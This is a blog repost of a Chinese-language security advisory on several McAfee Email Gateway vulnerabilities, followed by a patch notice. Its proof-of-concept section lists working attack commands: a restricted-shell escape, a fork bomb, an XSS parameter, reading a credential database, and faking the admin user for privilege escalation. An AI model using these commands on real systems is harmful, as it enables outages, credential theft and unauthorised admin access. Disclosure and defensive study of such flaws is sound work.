Chinaunix首页 | 论坛 | 博客
  • 博客访问: 997281
  • 博文数量: 186
  • 博客积分: 26713
  • 博客等级: 上将
  • 技术积分: 2154
  • 用 户 组: 普通用户
  • 注册时间: 2006-04-26 15:15
文章分类

全部博文(186)

文章存档

2010年(186)

分类:

2010-04-09 15:51:54

发布日期:2010-04-06
更新日期:2010-04-08

受影响系统:
McAfee Email Gateway 6.7.2 HF1
McAfee Email Gateway 6.7.1
不受影响系统:
McAfee Email Gateway 6.7.2 Hotfix 2
描述: BUGTRAQ  ID: 39242

McAfee Email Gateway之前名为IronMail,是企业级的硬件邮件网关和管理平台。

McAfee Email Gateway的6.7.2 Hotfix 2之前版本中的多个漏洞允许本地用户导致拒绝服务、读取敏感信息、获得权限提升,或允许远程攻击者执行跨站脚本攻击。

1) 处理CLI命令时的错误可能耗尽可用的系统资源。

2) 由于没有正确地过滤提交给admin/queuedMessage.do页面的queueMsgType和QtnType参数,远程攻击者可以通过提交恶意请求执行跨站脚本攻击。

3) 由于没有正确地限制对包含有敏感信息文件的访问,本地用户可以通过发布CLI命令泄露用户名或数据库凭据。

4) 处理环境变量时的错误可能允许本地用户通过CLI获得管理权限。

<*来源:Nahuel Grisolía
  
  链接:http://secunia.com/advisories/39307/
        
        
        
        
        
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

拒绝服务

[Secure Mail]: command rbash –noprofile
[Secure Mail]: :(){:|:&};:

跨站脚本

("XSS");&QtnType=9

信息泄露

[Secure Mail]: command rbash –noprofile
[Secure Mail]: grep -a '.*' /etc/pwd.db

本地权限提升

[Secure Mail]: command rbash –noprofile
[Secure Mail]: declare -x USER="admin"
If you want to check the new privilege:
[Secure Mail]: cmd_admin set user unlock
*** Invalid command: Usage - set user unlock ***
[Secure Mail]: cmd_admin set user unlock admin
Cannot unlock yourself.
[Secure Mail]: exi

建议: 厂商补丁:

McAfee
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://supportcenter.securecomputing.com/

浏览次数:57
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
阅读(2094) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~